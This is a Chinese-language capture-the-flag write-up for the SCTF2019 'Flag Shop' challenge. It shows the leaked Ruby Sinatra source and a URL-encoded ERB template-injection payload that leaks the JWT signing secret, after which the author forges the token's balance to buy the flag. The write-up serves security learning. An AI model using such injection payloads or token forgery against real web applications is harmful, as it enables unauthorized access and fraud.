[SCTF2019]Flag Shop

进入网页,可以看到是一个shop界面。
点击工作就可以获得钱,直到得到足够得钱购买flag.
最开始以为他是个逻辑漏洞,以为爆破下就可以,显然不成。
因为他得cookie中存有自己得钱得记录,以及他的个人信息。
爆破虽然可以增加钱,但是返回的cookie也要重新当作我们的head。
具体得爆破脚本如此得话可能是可以实现的。没有进行尝试。

进去后还是选择了看一下/robots.txt,发现了存有filebak。进入后查看源码,发现是ruby写的,定位到/work路由下,存在name如果和do参数所传得参数相同时即可返回jwt所用得key.
为了防止特殊字符影响使用url编码传参,

require 'sinatra'

require 'sinatra/cookies'

require 'sinatra/json'

require 'jwt'

require 'securerandom'

require 'erb'

set :public_folder, File.dirname(__FILE__) + '/static'

FLAGPRICE = 1000000000000000000000000000

ENV["SECRET"] = SecureRandom.hex(64)

configure do

  enable :logging

  file = File.new(File.dirname(__FILE__) + '/../log/http.log',"a+")

  file.sync = true

  use Rack::CommonLogger, file

end

get "/" do

  redirect '/shop', 302

end

get "/filebak" do

  content_type :text

  erb IO.binread __FILE__

end

get "/api/auth" do

  payload = { uid: SecureRandom.uuid , jkl: 20}

  auth = JWT.encode payload,ENV["SECRET"] , 'HS256'

  cookies[:auth] = auth

end

get "/api/info" do

  islogin

  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }

  json({uid: auth[0]["uid"],jkl: auth[0]["jkl"]})

end

get "/shop" do

  erb :shop

end

get "/work" do

  islogin

  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }

  auth = auth[0]

  unless params[:SECRET].nil?

    if ENV["SECRET"].match("#{params[:SECRET].match(/[0-9a-z]+/)}")

      puts ENV["FLAG"]

    end

  end

  if params[:do] == "#{params[:name][0,7]} is working" then

    auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)

    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'

    cookies[:auth] = auth

    ERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result

  end

end

post "/shop" do

  islogin

  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }

  if auth[0]["jkl"] < FLAGPRICE then

    json({title: "error",message: "no enough jkl"})

  else

    auth << {flag: ENV["FLAG"]}

    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'

    cookies[:auth] = auth

    json({title: "success",message: "jkl is good thing"})

  end

end

def islogin

  if cookies[:auth].nil? then

    redirect to('/shop')

  end

end
/work?SECRET=&name=%3c%25%3d%24%27%25%3e&do=%3c%25%3d%24%27%25%3e%20is%20working

之后就是用Jwt解密网站搞一下金钱,买flag.
查看返回得cookie,就拿到了flag.

推荐文章